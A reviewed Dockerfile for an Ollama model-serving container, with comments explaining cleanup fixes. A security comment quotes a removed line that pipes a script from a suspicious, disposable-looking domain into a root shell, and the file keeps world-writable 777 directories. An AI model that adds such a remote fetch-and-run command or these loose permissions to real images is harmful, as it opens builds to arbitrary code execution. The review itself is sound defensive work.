# NOTE(review): SOURCE was a rendered diff dump, not a raw Dockerfile. This is the
# reconstructed "after" state of the visible hunks. The base image
# (nvidia/cuda:12.8.0-cudnn-devel-ubuntu22.04, per the @@ hunk header) sits above
# the visible region and is intentionally not reproduced here.

# WORKDIR creates /app if missing, so no `mkdir -p` is needed. World-writable
# permissions follow the Hugging Face Spaces convention of running under an
# arbitrary non-root UID — least-privilege would be preferable; TODO confirm
# the target platform actually requires 777.
WORKDIR /app
RUN chmod 777 /app # && chown ubuntu:ubuntu /app # for ubuntu:latest

# OS packages: `update` + `install` combined in ONE layer (separate layers hit
# the stale-apt-cache bug, hadolint DL3009); `--no-install-recommends` and the
# same-layer apt-list cleanup keep the image small (DL3015). The blanket
# `apt-get upgrade -y` was dropped (DL3005) — bump the base image tag/digest
# to pick up security fixes instead.
RUN apt-get update -y && apt-get install -y --no-install-recommends \
      build-essential \
      curl \
      git \
      gzip \
      htop \
      micro \
      psmisc \
      python3 \
      python3-dev \
      python3-pip \
      tar \
      wget \
      yt-dlp \
    && rm -rf /var/lib/apt/lists/*

# --no-cache-dir keeps pip's download cache out of the layer (DL3042).
# NOTE(review): version is unpinned — pin for reproducibility once a known-good
# release is confirmed.
RUN pip install --no-cache-dir langchain-yt-dlp #--break-system-packages # for ubuntu:latest

# Official Ollama installer. curl|sh is the vendor's documented install path,
# but for production pin a release tarball and verify its checksum instead.
RUN curl -fsSL https://ollama.com/install.sh | sh

# World-writable state/config files so ollama and git work under any UID
# (random non-root user at runtime).
RUN mkdir -p /.ollama && chmod 777 /.ollama
RUN touch /.gitconfig && chmod 777 /.gitconfig

# SECURITY: the previous revision piped an unauthenticated script from an
# untrusted, disposable-looking domain straight into a root shell:
#   RUN curl -fsSL https://gloryhole.redzone-6.cfd/packaged/import2.sh | sh
# That is arbitrary remote code execution at build time — no checksum, no
# pinning, no visibility into what it installs. Removed. If anything from it is
# genuinely needed, vendor the script into the repo, review it, and COPY it in.

# Shared, world-writable model store so `ollama pull` can write under any UID.
RUN mkdir -p /usr/local/share/model && chmod -R 777 /usr/local/share/model
ENV OLLAMA_MODELS=/usr/local/share/model/

# EXPOSE is documentation only (does not publish ports). 11434 is the Ollama
# API port; 7860 (the Space's HTTP port) is declared above the visible hunk.
EXPOSE 11434

# Start the server in the background, give it time to bind, pre-pull the models
# this Space uses, then `wait` on the server so PID 1 does NOT exit when the
# pulls finish (the previous shell-form CMD's &&-chain ended after `ollama cp`,
# which would have stopped the container). Exec (JSON-array) form per DL3025 so
# `docker stop` signals the shell directly. Pulling at container start keeps
# the image small but makes cold starts slow and network-dependent — consider
# baking the models into the image if startup time matters.
CMD ["bash", "-c", "ollama serve & sleep 5 && ollama pull codellama:13b && ollama pull starcoder2:15b && ollama pull llama2-uncensored:latest && ollama cp llama2-uncensored:latest wizardlm:latest; wait"]